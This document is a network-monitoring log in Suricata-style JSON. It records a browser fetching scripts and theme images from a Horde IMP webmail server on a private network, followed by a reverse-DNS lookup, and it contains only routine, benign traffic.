{"timestamp":"2020-02-29T00:27:04.575006+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:27:04.582851+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":5}} {"timestamp":"2020-02-29T00:27:04.583567+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:27:04.581934+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.583273+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:27:04.584564+0000","flow_id":1478837499648662,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53172,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:27:04.586989+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:27:04.588199+0000","flow_id":667939084230883,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53174,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:27:04.592501+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":6}} {"timestamp":"2020-02-29T00:27:04.592938+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:27:04.594190+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.594830+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:27:04.603692+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.603842+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.604106+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:27:04.609489+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} {"timestamp":"2020-02-29T00:27:04.611348+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.611374+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.611713+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} {"timestamp":"2020-02-29T00:27:04.612519+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:27:04.625672+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":4}} {"timestamp":"2020-02-29T00:27:04.669222+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:27:04.780014+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":5}} {"timestamp":"2020-02-29T00:27:04.780291+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:27:04.798054+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":6}} {"timestamp":"2020-02-29T00:27:04.803799+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:27:04.806387+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":7}} {"timestamp":"2020-02-29T00:27:04.807839+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:27:04.809644+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":8}} {"timestamp":"2020-02-29T00:27:04.811188+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:27:04.812217+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":9}} {"timestamp":"2020-02-29T00:27:04.816779+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:27:04.817929+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":10}} {"timestamp":"2020-02-29T00:27:04.818165+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.819069+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:27:04.819931+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":11}} {"timestamp":"2020-02-29T00:27:04.831587+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:27:04.843532+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51486,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54972,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:04.846223+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:27:04.847040+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.847645+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:27:04.874816+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":12}} {"timestamp":"2020-02-29T00:27:04.951715+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51486,"proto":"UDP","dns":{"type":"answer","id":54972,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:04.951715+0000","flow_id":1166099455991564,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51486,"proto":"UDP","dns":{"type":"answer","id":54972,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 